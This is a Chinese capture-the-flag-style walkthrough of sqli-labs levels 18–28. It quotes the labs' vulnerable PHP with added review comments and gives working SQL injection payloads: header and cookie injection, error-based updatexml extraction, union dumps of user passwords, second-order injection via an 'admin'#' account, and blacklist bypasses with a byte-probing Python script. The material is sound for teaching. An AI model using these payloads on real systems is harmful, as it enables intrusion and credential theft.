
sqli-labs2

18 UA注入

<? php

/**
 * Normalise one request value into a SQL-ready literal (sqli-labs lab code, PHP 5 era).
 *
 * Steps, in order:
 *   1. a non-empty value is cut to its first 20 bytes (substr is byte-wise);
 *   2. if magic_quotes_gpc is on, the backslashes PHP added are stripped again;
 *   3. a value that is not all digits is escaped with mysql_real_escape_string()
 *      and wrapped in single quotes; an all-digit value is cast to int instead.
 *
 * NOTE(review): get_magic_quotes_gpc() and the mysql_* extension no longer exist
 * in PHP 7/8, so this only runs on the lab's legacy stack. The quoting is only as
 * good as its coverage: the callers shown in this writeup pass $_POST fields
 * through it but never the User-Agent, Referer or cookie values they also place
 * in SQL. A prepared statement with bound parameters removes the need for this
 * kind of manual escaping altogether.
 *
 * @param mixed $value raw request value (normally a string from $_POST)
 * @return string|int single-quoted escaped string, or an int for digit-only input
 */
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // byte-wise truncation to 20 bytes (see docblock)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote (and escape) if not a pure digit string
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value); // digit-only input becomes an unquoted integer
}
return $value;
}

check_input()函数先截取前20位,

如果开启GPC,去掉反斜杠,

如果不是纯数字,则转义其中的特殊字符并加上单引号;如果是纯数字,则转为整数

// $uname and $passwd are interpolated as already-quoted literals — presumably the
// output of check_input() above (the assignment is not shown in this excerpt).
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
// NOTE(review): $uagent (the User-Agent header, per the echo below) and $IP are
// dropped into the INSERT as raw string content; nothing in this listing escapes
// them, which is the injection point this level exercises. The fix is a prepared
// statement with the three values bound as parameters.
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert); // return value ignored, so an INSERT failure is only visible via mysql_error() below
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent; // header value echoed back unescaped (no htmlspecialchars)
echo "</font>";
echo "<br>";
print_r(mysql_error()); // database error text is rendered to the client
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";

}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
... ...

这里对 username 和 password 做了处理,但没有对 UA 做处理,所以这里利用 UA 注入。

burp suite抓包改UA 1' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

19 Referer注入

// Both POST fields go through check_input() (escaped and quoted, or cast to int)
// before they reach the query; these are the only two request values that do.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
... ...

// $uname / $passwd come from check_input() above, so this SELECT is built from
// already-quoted literals. NOTE(review): the INSERT that follows in this level
// interpolates $uagent (here the Referer header, per the echo after it) and $IP
// without any such treatment — the same pattern as the User-Agent level.
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your Referer is: ' .$uagent;

改Referer 1' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

20 Cookie注入

// Login fields are escaped/quoted (or cast to int) by check_input() before use.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);




// $uname / $passwd are the check_input() results, so this SELECT itself is built from quoted literals.
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
// Read before the if($row1) check: when no row matched, $row1 is false and this
// yields null (silently on PHP 5; a notice from PHP 7.4 on).
$cookee = $row1['username'];
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
// NOTE(review): the username as stored in the database is handed back to the
// client as a cookie. The later levels' listings read it from $_COOKIE and place
// it straight into a query, so the cookie is an attacker-controlled SQL fragment
// unless it is bound as a parameter there.
setcookie('uname', $cookee, time()+3600);
// Output already started on the echo above, so unless output buffering is on
// this header() (and the setcookie() before it) fails with "headers already sent".
header ('Location: index.php');
echo "I LOVE YOU COOKIES";
echo "</font>";
echo '<font color= "#0000ff" font size = 3 >';
//echo 'Your Cookie is: ' .$cookee;
echo "</font>";
echo "<br>";
print_r(mysql_error()); // database error text is rendered to the client
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());

改Cookie

uname=1.9' and 1=1 union select 1,2,table_name from information_schema.tables where table_schema='security' limit 0,1 #或者

uname=1' and updatexml(1,concat(0x7e,(select * from ( select concat(username,password) from users limit 0,1)a),0x7e),1)#



21

if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
... ...

// The cookie is base64-decoded and then interpolated directly into the SQL text.
// base64 is an encoding, not a sanitiser: after decoding, the client fully controls
// what appears between the parentheses. No escaping and no parameter binding happen here.
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

... ...

与第 20 关相比,多了一层 base64 编码,这一关使用 ') 闭合。

uname=1') and updatexml(1,concat(0x7e,(select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e),1)# base64一下

MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0ICogZnJvbSAoIHNlbGVjdCBjb25jYXRfd3MoJzonLHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHVzZXJzIGxpbWl0IDAsMSlhKSwweDdlKSwxKSM=

22

if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
... ...
// Same shape as the previous level: decode the cookie, then wrap it in double
// quotes by string concatenation and splice it into the query. The wrapping does
// not escape the value, so the decoded cookie still decides the SQL that runs;
// a prepared statement with the username bound is the fix.
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

使用 " 闭合,其余与第 21 关相同。


23 # 和 -- 被过滤,单引号闭合,报错注入


# 和 -- 被过滤了,使用 ' 闭合

?id=1' and '1'='1

?id=1'%20 order by 5 and '1'='1无法通过这种方式判断字段数

?id=-1' union select 1,2 and '1'='1报错

?id=-1' union select 1,2,3 and '1'='1不报错

?id=-1' union select 1,2,3 and '1'='1报错

可以判断有三个字段,2,3是回显点,但是3处输出结果只有0和1,估计是布尔型,所以把2当作输出点

当然这里亦可以使用报错注入,相对简单点

?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1



24 二次注入

# pass_change.php

<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

if (isset($_POST['submit']))
{

# Only the three POST fields are escaped. $username is taken straight from the
# session — it was stored there at login from a database row, and nothing here
# escapes it before it is placed in the UPDATE below. That stored-then-reused
# value is the second-order injection this level demonstrates.
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);

if($pass==$re_pass) // loose comparison; === would be the strict form
{
// NOTE(review): the remedy is a prepared statement with $pass, $username and
// $curr_pass bound as parameters — escaping at input time does not protect a
// value that is later read back from storage. Passwords are also compared and
// stored in plaintext here; password_hash()/password_verify() is the standard.
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
// NOTE(review): mysql_affected_rows() counts rows actually changed, so re-setting
// the identical password would presumably report 0 and hit the failure branch — confirm.
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
// Output has already been echoed above, so without output buffering this
// redirect fails with "headers already sent".
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php'); // same headers-already-sent caveat as above
}
}
?>
<?php
// Logout handler: destroy the server-side session, expire the "Auth" cookie
// (set to the constant 1 at login, so it carries no secret by itself) and
// redirect. NOTE(review): session_destroy() requires an active session;
// the session_start() call is not visible in this excerpt — confirm it runs first.
if(isset($_POST['submit1']))
{
session_destroy();
setcookie('Auth', 1 , time()-3600); // expiry in the past removes the cookie
header ('Location: index.php');
}
?>

UPDATE 修改密码时,$username 直接取自 session,并没有做任何过滤处理。

#login.php
<? php
...

/**
 * Look up the posted credentials and return the matched row's column 1
 * (the caller stores that value as $_SESSION["username"]), or 0 when no row matched.
 *
 * Both POST fields are escaped with mysql_real_escape_string() before being
 * interpolated, so this query itself is protected against the classic quote break.
 * NOTE(review): the protection stops at this statement — the value returned here
 * is what the password-change page later reads back from the session and places
 * unescaped into its UPDATE. Passwords are also compared in plaintext inside the
 * SQL; hashing (password_hash/password_verify) and a prepared statement would be
 * the standard way to write this.
 *
 * @return string|int column 1 of the matched row, or 0
 */
function sqllogin(){

$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
$res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( '); // die() stops the page on a query error
$row = mysql_fetch_row($res);
//print_r($row) ;
if ($row[1]) { // truthiness check: a "0" or "" in column 1 would also fall to the else branch
return $row[1];
} else {
return 0;
}

}


$login = sqllogin();
// NOTE(review): `!` binds tighter than `==`, so this reads as `(!$login) == 0`.
// It happens to work for the two values sqllogin() returns (a non-empty string
// or 0), but `$login !== 0` is what was meant.
if (!$login== 0)
{
// The database-supplied username is stored as-is; it is reused unescaped by the
// password-change page, which is where the second-order injection lands.
$_SESSION["username"] = $login;
setcookie("Auth", 1, time()+3600); /* expires in 1 hour (3600 s); the original comment said 15 minutes */
header('Location: logged-in.php');
}
else
{ ... ...

登录成功时,$_SESSION["username"] 被直接取出使用,并没有过滤,所以这里的 $username 是可控变量。



先注册一个admin'#账号 随便设置一个密码123456,登录后修改密码为12345

再用 admin 登录,发现 admin 的原密码已被改成 12345。


25 or and被过滤

// $id is spliced into the query as the content of a single-quoted literal. The only
// treatment it receives is presumably blacklist() below (the call is not shown) —
// keyword stripping, not escaping or parameter binding.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";



/**
 * Denylist filter from the Less-25 lab: deletes every case-insensitive
 * occurrence of "or", then of "and", from $id — one pass each, in that order.
 *
 * NOTE(review): this is the lab's intentionally weak control. A single-pass
 * substring delete can be undone by input that re-forms the keyword once its
 * inner copy is removed (the writeup's double-write), and it also mangles
 * legitimate values such as "order" or "password". Binding $id as a query
 * parameter makes keyword stripping unnecessary.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    $patterns = ['/or/i', '/AND/i'];

    $filtered = $id;
    foreach ($patterns as $pattern) {
        $filtered = preg_replace($pattern, "", $filtered);
    }

    return $filtered;
}

根据图片提示,or 和 and 被过滤了,使用 ' 闭合。

?id=1' --+

?id=1.99' aandnd 1=1 union select 1,2,3%20 --+ 2,3为输出点

或者 ?id=1.99' aandnd 1=1 union select 1,2,3%20 anandd '1'='1

虽然被过滤掉了,但可以使用双写绕过


25a or and被过滤

// Unlike the previous level there are no quotes around $id: whatever survives
// blacklist() (call not shown in this excerpt) is placed directly as a SQL
// expression. An integer cast or a bound parameter is the appropriate control here.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";


/**
 * Denylist filter from the Less-25a lab (identical to Less-25): strips "or"
 * and then "and", case-insensitively, in a single pass each.
 *
 * preg_replace() with an array of patterns applies them in array order, each to
 * the result of the previous one, so the two-statement form of the lab listing
 * and this one-call form are equivalent.
 *
 * NOTE(review): a substring denylist is not a security control — see the
 * writeup's own bypass; bind $id as a parameter instead.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    return preg_replace(['/or/i', '/AND/i'], "", $id);
}


与第 25 关相比,少了 '。

?id=1 oorrder by 3

?id=0 union select 1,database(),3


26 or/and/*/-/#/空格和斜杠被过滤

	// $id lands inside a single-quoted literal after blacklist() (below); the filter
	// strips keywords and characters but performs no escaping or parameter binding.
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

/**
 * Denylist filter from the Less-26 lab, applied to $id before it is queried.
 *
 * Seven single-pass deletions, in this order: "or" and "and" (case-insensitive);
 * the characters '/' and '*'; '-'; '#'; any whitespace character; '/' and '\'.
 *
 * NOTE(review): `[--]` is a character class containing only '-', so every
 * single hyphen is removed (not the "--" sequence the lab comment implied).
 * The writeup goes on to show that stripping characters one pass at a time
 * still leaves room for alternative encodings; the durable control is a
 * prepared statement with $id bound as a parameter, after which none of this
 * stripping is needed.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    $patterns = [
        '/or/i',      // "or", any case
        '/and/i',     // "and", any case
        '/[\/\*]/',   // '/' and '*'
        '/[--]/',     // '-' (a one-character class)
        '/[#]/',      // '#'
        '/[\s]/',     // any whitespace character
        '/[\/\\\\]/', // '/' and '\'
    ];

    foreach ($patterns as $pattern) {
        $id = preg_replace($pattern, "", $id);
    }

    return $id;
}


import requests

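def changeToHex(num):
    """Return ``num`` as one percent-encoded byte: 9 -> '%09', 160 -> '%a0', 255 -> '%ff'.

    Bug fixed: the original body read the module-level loop variable ``i``
    instead of the ``num`` parameter, so the function only worked when called
    from that loop. Output is lower-case hex, zero-padded to two digits,
    matching the original's ``hex()`` + ``'0'``-prefix behaviour.

    :param num: integer byte value
    :return: ``'%xx'`` string
    """
    return "%%%02x" % num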

# Filter-coverage probe for the local lab (Python 2 syntax: xrange, print statement).
# Each byte value 0..255 is percent-encoded and sent in the id parameter; a response
# containing 'Dumb' (presumably the lab's normal page text) means the request still
# parsed as valid SQL after blacklist() ran — i.e. that byte was not stripped.
req = requests.session()
for i in xrange(0,256):
    i = changeToHex(i)  # rebinds the loop variable to its '%xx' form
    url = "http://localhost/sqli-labs/Less-26/?id=1'" + i + "%26%26" + i + "'1'='1"
    ret = req.get(url)
    if 'Dumb' in ret.content:
        print "good,this can use:" + i

#good,this can use:%09
#good,this can use:%0a
#good,this can use:%0b
#good,this can use:%0c
#good,this can use:%0d
#good,this can use:%20
#good,this can use:%22
#good,this can use:%23
#good,this can use:%27
#good,this can use:%2a
#good,this can use:%2d
#good,this can use:%2f
#good,this can use:%5c

%20(空格)、%23(#)、%2a(*)、%2d(-)、%2f(/)、%5c(\),%09-%0d都是制表符、换行符、换页符

但是这一关在 Linux 环境下可以解析 %a0,Windows 下则无法解析。

这一关有三种注入方式:

  • union select 联合注入,用特殊编码符代替空格
  • 报错注入,为了避开空格,选择使用 updatexml() 或 extractvalue()
  • Bool盲注,构造避开空格的语句

使用||替换and

?id=1'||'1'='1

?id=0'||updatexml(1,concat(0x7e,(database()),0x7e),1)||'1'='1

?id=0'||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')),0x7e),1)||'1'='1


26a or/and/*/-/#/空格和斜杠被过滤

	// $id is placed inside ('…') — a quoted literal in parentheses — after blacklist()
	// (below). The filter strips characters; it does not escape or bind the value.
	$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

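/**
 * Denylist filter from the Less-26a lab.
 *
 * Deletions, one pass each, in order: "or" and "and" (case-insensitive);
 * '/' and '*'; '-'; '#'; any whitespace; '/' and '\'.
 *
 * Change vs. the lab listing: the whitespace pass was written twice in a row;
 * the second copy could never match anything (the first already removed every
 * whitespace character and nothing runs in between), so it is dropped.
 * Behaviour is unchanged.
 *
 * NOTE(review): `[--]` is a one-character class — it removes each single '-',
 * not the "--" sequence the lab comment described. Character stripping of this
 * kind is not a reliable control (the writeup shows why); a prepared statement
 * with $id bound as a parameter is the fix.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);      // strip out "or", any case
    $id = preg_replace('/and/i', "", $id);     // strip out "and", any case
    $id = preg_replace('/[\/\*]/', "", $id);   // strip out / and *
    $id = preg_replace('/[--]/', "", $id);     // strip out - (single character)
    $id = preg_replace('/[#]/', "", $id);      // strip out #
    $id = preg_replace('/[\s]/', "", $id);     // strip out every whitespace character
    $id = preg_replace('/[\/\\\\]/', "", $id); // strip out / and \
    return $id;
}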

?id=1')||('1'='1



27 */-/#/空格/*/union/select被过滤

	// $id sits inside a single-quoted literal; its only treatment is the keyword/
	// character stripping in blacklist() below — no escaping, no parameter binding.
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

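/**
 * Denylist filter from the Less-27 lab.
 *
 * Single-pass deletions, in order: '/' and '*'; '-'; '#'; space and '+';
 * then the exact spellings "select", "union", "select", "UNION", "SELECT",
 * "Union", "Select". The second "select" pass is not redundant: deleting
 * "union" can join the surrounding fragments into a new "select", which this
 * pass then removes.
 *
 * Changes vs. the lab listing: the space/'+' pass that was repeated after the
 * first "select" deletion is dropped — nothing between the two copies could
 * reintroduce a space or '+', so behaviour is unchanged — and the comments that
 * said "Strip out spaces" on keyword lines are corrected.
 *
 * NOTE(review): `[--]` is a one-character class (each single '-'), and only the
 * seven listed spellings are matched. Denylists of exact spellings are
 * notoriously incomplete, as the writeup demonstrates; binding $id as a query
 * parameter is the control that does not depend on enumerating keywords.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);  // strip out / and *
    $id = preg_replace('/[--]/', "", $id);    // strip out - (single character)
    $id = preg_replace('/[#]/', "", $id);     // strip out #
    $id = preg_replace('/[ +]/', "", $id);    // strip out spaces and +
    $id = preg_replace('/select/m', "", $id); // strip out select
    $id = preg_replace('/union/s', "", $id);  // strip out union
    $id = preg_replace('/select/s', "", $id); // strip out select again (see docblock)
    $id = preg_replace('/UNION/s', "", $id);  // strip out UNION
    $id = preg_replace('/SELECT/s', "", $id); // strip out SELECT
    $id = preg_replace('/Union/s', "", $id);  // strip out Union
    $id = preg_replace('/Select/s', "", $id); // strip out Select
    return $id;
}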

?id=0%27%a0unIon%a0sElect%a01,2,%273

?id=0%27%a0unIon%a0sElect%a01,(sElect%a0group_concat(password)from%a0users)%20,%273



27a */-/#/空格/*/union/select被过滤

	// No quotes around $id here: the filtered value is placed directly as a SQL
	// expression, so an integer cast or a bound parameter is the appropriate control.
	$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";


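/**
 * Denylist filter from the Less-27a lab (same rules as Less-27).
 *
 * In order, each applied once: remove '/' and '*'; remove '-'; remove '#';
 * remove space and '+'; then remove "select", "union", "select" (a second time,
 * because removing "union" may have joined fragments into "select"), "UNION",
 * "SELECT", "Union" and "Select".
 *
 * The lab listing ran the space/'+' removal twice with only the first "select"
 * removal in between; since deleting a keyword cannot create a space or '+',
 * the repeat was a no-op and has been removed. Comments that mislabelled the
 * keyword lines as "Strip out spaces" are fixed. Output is identical.
 *
 * NOTE(review): `[--]` matches a single '-' (it is a character class), and the
 * keyword list is exact-spelling only. Prefer a prepared statement with $id
 * bound as a parameter over any denylist.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    $characterPatterns = [
        '/[\/\*]/', // / and *
        '/[--]/',   // - (single character)
        '/[#]/',    // #
        '/[ +]/',   // space and +
    ];
    foreach ($characterPatterns as $pattern) {
        $id = preg_replace($pattern, "", $id);
    }

    // Exact spellings, in the lab's order; the repeated lowercase "select" is intentional.
    $keywordPatterns = [
        '/select/m',
        '/union/s',
        '/select/s',
        '/UNION/s',
        '/SELECT/s',
        '/Union/s',
        '/Select/s',
    ];
    foreach ($keywordPatterns as $pattern) {
        $id = preg_replace($pattern, "", $id);
    }

    return $id;
}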

?id=1" ||"1"="1 双引号闭合

?id=0%22%20UnIon%a0SeLect%a01,2,3%22

?id=0%22%20UnIon%a0SeLect%a01,(SeLect%a0group_concat(password)from%a0users),3%22


28 */-/#/+/空格/union/select被过滤

	// $id is placed inside ('…') after blacklist() (below); the filter only removes
	// characters and one keyword pair — it does not escape or bind the value.
	$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";


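/**
 * Denylist filter from the Less-28 lab.
 *
 * Single-pass deletions, in order: '/' and '*'; '-'; '#'; space and '+'; then
 * "union<whitespace>select" in any letter case. (The lab listing also carried a
 * commented-out lowercase "select" pass, which is omitted here as dead code.)
 *
 * Change vs. the lab listing: the space/'+' pass was written twice in a row;
 * the second copy could never match (the first had already removed every space
 * and '+'), so it is dropped. Behaviour is unchanged.
 *
 * NOTE(review): the two active rules interact — ordinary spaces are removed
 * before the `\s+` in the final pattern is evaluated, so that pattern only ever
 * sees the other whitespace characters. Rule ordering bugs like this are
 * inherent to denylists; a prepared statement with $id bound as a parameter
 * avoids the problem entirely.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);          // strip out / and *
    $id = preg_replace('/[--]/', "", $id);            // strip out - (single character)
    $id = preg_replace('/[#]/', "", $id);             // strip out #
    $id = preg_replace('/[ +]/', "", $id);            // strip out spaces and +
    $id = preg_replace('/union\s+select/i', "", $id); // strip out "union<whitespace>select", any case
    return $id;
}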


id=0%27)%a0UnIon%a0SEleCt%a01,2,(%273


28a */-/#/+/空格/union/select被过滤

	// Same query shape as Less-28: $id inside ('…'), preceded only by blacklist()
	// (below), which in this level removes a single keyword pair and nothing else.
	$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";


/**
 * Denylist filter from the Less-28a lab: the only active rule deletes every
 * "union<whitespace>select" sequence, case-insensitively, in one pass. The six
 * character-stripping rules of Less-28 are present in the lab source but
 * commented out, so this level performs no other filtering.
 *
 * NOTE(review): a single regex for one keyword pair is a very thin control —
 * the writeup shows it does not hold. Bind $id as a query parameter instead.
 *
 * @param string $id raw request parameter
 * @return string|null filtered value (null if preg_replace reports an error)
 */
function blacklist($id)
{
    return preg_replace('/union\s+select/i', "", $id);
}


id=0%27)%a0UnIon%a0SEleCt%a01,2,(%273
